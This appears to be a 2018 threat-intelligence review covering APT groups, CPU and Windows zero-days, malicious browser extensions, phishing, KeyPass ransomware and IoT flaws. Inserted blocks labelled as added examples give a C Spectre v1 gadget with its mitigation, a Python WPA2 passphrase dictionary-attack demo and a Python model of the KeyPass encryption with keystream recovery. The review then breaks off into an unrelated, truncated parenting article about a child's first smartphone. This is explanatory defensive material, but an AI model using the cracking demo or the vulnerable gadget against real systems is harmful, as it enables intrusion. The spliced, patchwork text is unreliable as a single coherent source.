In October, we reported the recent activity of the MuddyWater APT group. Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

  • Educate general staff so that they are able to identify malicious behaviour such as phishing links.
  • Educate information security staff to ensure that they have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules.
  • Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program called Octopus, used by DustSquad to target diplomatic bodies in the region – the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating – in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis of Dark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks – DanderSpritz and FuzzBunch. FuzzBunch contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsar here.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of the Zoopark, BusyGasper and Skygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose – spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone – the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting modern CPUs were reported. Dubbed Meltdown and Spectre, both allow an attacker to read memory that a process should not be able to access: Meltdown from any process on the host, Spectre from the address space of the exploited process itself. The vulnerabilities have been present in hardware since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways – for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs – possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So the update was only installed if an antivirus product had first set a specific registry key, indicating that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre only reads the memory space of the exploited process, not that of any process, which still matters when that process is, for example, a browser holding data from many sites. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports that the vulnerabilities are not easily fixable. Most of the released patches have reduced the attack surface, mitigating known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the way the vulnerable CPUs work, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.
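To make the Spectre variant one (bounds check bypass) problem concrete, here is an added example in C, not code from the original report or from any of the vendors it mentions. It shows the classic vulnerable gadget next to a hardened version that clamps the index with a branchless mask, the same technique the Linux kernel applies in array_index_mask_nospec(). The array names and sizes, the cache-line stride of 512 bytes and the clamp_index_nospec() helper are assumptions made for the example; the sample data is constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed sample data. In a real Spectre v1 attack the attacker controls
 * x, trains the branch predictor with many in-bounds calls, then supplies an
 * out-of-bounds x so that the body runs speculatively anyway. */
#define ARRAY1_SIZE 16
static uint8_t array1[ARRAY1_SIZE] = { 1, 2, 3, 4, 5, 6, 7, 8,
                                       9, 10, 11, 12, 13, 14, 15, 16 };
static uint8_t array2[256 * 512];   /* one cache line per possible byte value */

/* Vulnerable gadget (Spectre variant 1). Architecturally the bounds check
 * holds, but the CPU may speculatively execute the body with x >= ARRAY1_SIZE.
 * The dependent load then touches array2[array1[x] * 512], i.e. a cache line
 * selected by a byte from beyond array1. That line stays cached after the
 * misspeculation is discarded, so a cache-timing probe of array2 leaks it. */
uint8_t victim_vulnerable(size_t x)
{
    if (x < ARRAY1_SIZE)
        return array2[array1[x] * 512];
    return 0;
}

/* Branchless mask in the spirit of the Linux kernel's
 * array_index_mask_nospec(): all ones when idx < size, zero otherwise.
 * No branch is involved, so the mask is applied even on a mispredicted path.
 * Assumes size <= SIZE_MAX / 2, which holds for any real array. */
static inline size_t index_mask_nospec(size_t idx, size_t size)
{
    size_t u = idx | (size - 1 - idx);             /* top bit set iff idx >= size */
    size_t out_of_bounds = u >> (sizeof(size_t) * 8 - 1);
    return (size_t)0 - (out_of_bounds ^ 1);        /* SIZE_MAX when in bounds */
}

/* Clamp idx to 0 when out of range (hypothetical helper for the example). */
size_t clamp_index_nospec(size_t idx, size_t size)
{
    return idx & index_mask_nospec(idx, size);
}

/* Hardened gadget: the index feeding the dependent load is forced to 0
 * whenever it is out of bounds, on the speculative path as well. The
 * compiler must keep the mask; a compiler barrier or volatile is used in
 * production code to stop it being folded back into the branch. */
uint8_t victim_hardened(size_t x)
{
    if (x < ARRAY1_SIZE) {
        x = clamp_index_nospec(x, ARRAY1_SIZE);
        return array2[array1[x] * 512];
    }
    return 0;
}

int main(void)
{
    size_t probes[] = { 3, 15, 16, 1000, SIZE_MAX };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("idx %zu -> clamped %zu\n", probes[i],
               clamp_index_nospec(probes[i], ARRAY1_SIZE));
    return 0;
}
```

The example cannot demonstrate the cache side channel itself (that needs timing measurements and a trained predictor), but it shows why the fix works: the mask depends only on arithmetic over the index, so even when the CPU guesses the branch wrong, the out-of-bounds index never reaches the load that would leave the tell-tale cache footprint.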

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) – patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability. The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East – we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ – which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies – the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Browser extensions – extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. The malicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows. They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension.

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We also provided tips on how to avoid phishing scams – advice that holds true for any phishing scams, not just for those related to the World Cup.

In the run up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots offered no reliable protection. This meant that criminals simply needed to be within range of such an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, in particular the strength of the password set by the hotspot owner: a long, complex passphrase can take years to recover by brute force. However, even reliable networks, like WPA2, cannot automatically be considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation (KRACK) attacks, for which a large number of tutorials and open source tools are available online. Traffic on a WPA/WPA2 hotspot can also be intercepted by capturing the handshake between the device and the access point at the start of the session; on a public hotspot the passphrase is shared with every customer, so anyone who captures that handshake can derive the session keys and read the traffic.
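To make the password-strength point concrete, here is an added example (not from the Kaspersky report) of how WPA/WPA2-Personal turns a passphrase into the pre-shared key, and what a dictionary attack against it costs. It uses only the Python standard library; the SSID, passphrase and wordlist are constructed, and comparing PMKs directly is a simplification of the real check against a captured handshake, noted in the code.

```python
"""WPA/WPA2-Personal key derivation and the cost of guessing passphrases.
Added example, stdlib only; SSIDs, passphrases and wordlist are constructed."""
import hashlib
import hmac
import time


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes),
    as specified for WPA/WPA2-Personal in IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def dictionary_attack(target_pmk: bytes, ssid: str, wordlist):
    """Try each candidate passphrase in turn.
    Simplification: a real attacker never sees the PMK. They derive the
    session keys from each candidate and check them against the MIC of a
    captured 4-way handshake. That costs about the same per guess (one
    PBKDF2 run dominates), so comparing PMKs models the work factor."""
    for guess in wordlist:
        if hmac.compare_digest(wpa2_pmk(guess, ssid), target_pmk):
            return guess
    return None


def guesses_per_second(ssid: str, samples: int = 50) -> float:
    """Measure single-core PBKDF2 throughput on this machine. Dedicated
    hardware runs orders of magnitude faster, so this is a floor."""
    start = time.perf_counter()
    for i in range(samples):
        wpa2_pmk("candidate%d" % i, ssid)
    return samples / (time.perf_counter() - start)


def years_to_exhaust(charset_size: int, length: int, rate: float) -> float:
    """Worst-case time to enumerate every passphrase of the given shape."""
    return (charset_size ** length) / rate / (365.25 * 24 * 3600)


if __name__ == "__main__":
    ssid = "CafeHotspot"                                    # constructed
    weak = wpa2_pmk("sunshine1", ssid)
    wordlist = ["password", "12345678", "sunshine1", "letmein12"]  # constructed
    print("recovered:", dictionary_attack(weak, ssid, wordlist))
    rate = guesses_per_second(ssid)
    print(f"{rate:,.0f} guesses/s on one core")
    print("8 lowercase letters: %.2f years" % years_to_exhaust(26, 8, rate))
    print("16 mixed characters: %.3g years" % years_to_exhaust(62, 16, rate))
```

The 4096-iteration PBKDF2 is the only thing standing between a captured handshake and the passphrase, which is why a hotspot owner’s choice of password decides how long the network holds up.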

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be – not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises – primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into opening malicious attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of the financial and accounting software used by the victims. The attackers then used different ploys to steal company money – for example, by replacing the banking details in transactions. By the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Ransomware – still a threat

The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the KeyPass Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON. If the C2 is unavailable – for example, if the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.
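The scheme described above is worth seeing in code, because it shows two separate weaknesses: with the offline key known, decryption is one function call, and even without it, a fixed key plus a zero IV in CFB mode means the first keystream block is identical for every file, so one file with a known header leaks it. The block below is an added analyst’s model, not the Trojan’s code; the 32-byte key is a stand-in (the real hardcoded value is not reproduced) and the files are constructed. It needs the `cryptography` package.

```python
"""Model of the KeyPass file-encryption scheme: AES-256-CFB, zero IV, one
32-byte key for every file, only the first 0x500000 bytes of each file.
Added example, not the Trojan's code; HARDCODED_KEY is a stand-in value.
Requires the 'cryptography' package."""
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

ENCRYPT_LIMIT = 0x500000   # ~5 MB; anything past this is left in clear
ZERO_IV = bytes(16)
# Stand-in for the key the Trojan falls back to when its C2 is unreachable
# (assumption: any fixed 32-byte value reproduces the weakness).
HARDCODED_KEY = bytes(range(32))


def _cipher(key: bytes) -> Cipher:
    return Cipher(algorithms.AES(key), modes.CFB(ZERO_IV))


def keypass_encrypt(data: bytes, key: bytes = HARDCODED_KEY) -> bytes:
    """Encrypt only the first ENCRYPT_LIMIT bytes; copy the rest unchanged."""
    head, tail = data[:ENCRYPT_LIMIT], data[ENCRYPT_LIMIT:]
    enc = _cipher(key).encryptor()
    return enc.update(head) + enc.finalize() + tail


def keypass_decrypt(data: bytes, key: bytes = HARDCODED_KEY) -> bytes:
    """With the offline key known, recovery is the same operation in reverse."""
    head, tail = data[:ENCRYPT_LIMIT], data[ENCRYPT_LIMIT:]
    dec = _cipher(key).decryptor()
    return dec.update(head) + dec.finalize() + tail


def recover_keystream_prefix(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """CFB keystream block 1 is AES_k(IV). With a fixed key and IV = 0 it is
    the same for every file, so one file with a known header (a PDF or ZIP
    signature, say) leaks it: K1 = C1 XOR P1. Only as many bytes as are
    known can be recovered, up to the 16-byte block."""
    n = min(16, len(ciphertext), len(known_plaintext))
    return bytes(c ^ p for c, p in zip(ciphertext[:n], known_plaintext[:n]))


def decrypt_prefix_without_key(ciphertext: bytes, keystream: bytes) -> bytes:
    """Apply a recovered keystream prefix to another file's first block."""
    return bytes(c ^ k for c, k in zip(ciphertext, keystream))


if __name__ == "__main__":
    invoice = b"%PDF-1.7\n" + b"\x00" * 64                # constructed
    report = b"%PDF-1.4\n" + b"\x01" * 64                 # constructed
    ct_invoice = keypass_encrypt(invoice)
    ct_report = keypass_encrypt(report)
    assert keypass_decrypt(ct_invoice) == invoice        # trivial with the key
    k1 = recover_keystream_prefix(ct_invoice, invoice)   # no key needed
    print(decrypt_prefix_without_key(ct_report, k1))     # first 16 bytes of report
    big = bytes(ENCRYPT_LIMIT) + b"TAIL"
    assert keypass_encrypt(big)[ENCRYPT_LIMIT:] == b"TAIL"  # tail never encrypted
```

Beyond the first block the keystream depends on the previous ciphertext block, so the header trick recovers only the shared prefix, but files that start identically (same document template, same archive header) keep sharing keystream for as long as their plaintext agrees, and everything past 5 MB is never encrypted at all.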

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families – so far, we have seen 74,621 unique attacks worldwide. In Q3 2018 it accounted for 28.72% of all users attacked by cryptors, a share that has risen by two-thirds during the last year. This is especially alarming given that a patch (MS17-010) for the SMB vulnerability exploited by EternalBlue, the exploit WannaCry uses to spread, was available before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years.

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning – social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection – Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses – for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where a lack of standardization lets developers ignore security, or consider it only as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack. A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location – to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool – suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities – almost as many as it has features – that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station. This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about it here, here and here). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove all nodes that process personal medical data from public internet access, update software and remove applications that are no longer needed, and keep expensive medical equipment off the main LAN. You can find our detailed advice here.

This year, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities. Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies its server’s certificate itself (pinning) rather than relying solely on the system trust store. As a result, the others are vulnerable to man-in-the-middle (MitM) attacks: an intruder who persuades the victim to install an attacker-controlled certificate on the phone can intercept everything the app sends.

Some of our researchers also looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats, and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security. The German government recently published its suggestions for minimum standards for broadband routers.

It’s also important that consumers consider security before buying any connected device.

  • Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface.
  • Look online for information about any vulnerabilities that have been reported.
  • Check to see if it’s possible to update the firmware on the device.
  • Always change the default password and replace it with a unique, complex password.
  • Don’t share serial numbers, IP addresses and other sensitive data relating to the device online.

Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news – these include Under Armour, FIFA, Adidas, Ticketmaster, T-Mobile, Reddit, British Airways and Cathay Pacific.

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service – ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices. Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook, for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, and by using two-factor authentication.

First Smartphone: Are You Putting Cyberbullies Under the Tree This Year?


There’s pressure — lots of pressure. And not the typical I-want-a-bike or a doll-that-poops kind of pressure your kids may have foisted upon you just a few Christmases ago. No, this is the big leagues. Your child wants his or her first smartphone to show up under the tree this year. Is your son or daughter ready? Bigger question: Are you ready?

A first smartphone is a big step in a family that can’t be unstepped. Because it’s not about what a phone used to be about, which is dialing the number of a person you need to speak with. Today, giving your child a cell phone unlocks a hidden wardrobe door that leads to a whole new Narnia-like world abounding in both hills of goodness and valleys of emotional punches.

A first cell phone isn’t a casual purchase. Besides the financial investment (these things aren’t cheap), there’s a family dynamic that will likely change and a peer-to-peer dynamic that will go through its tumultuous metamorphosis.

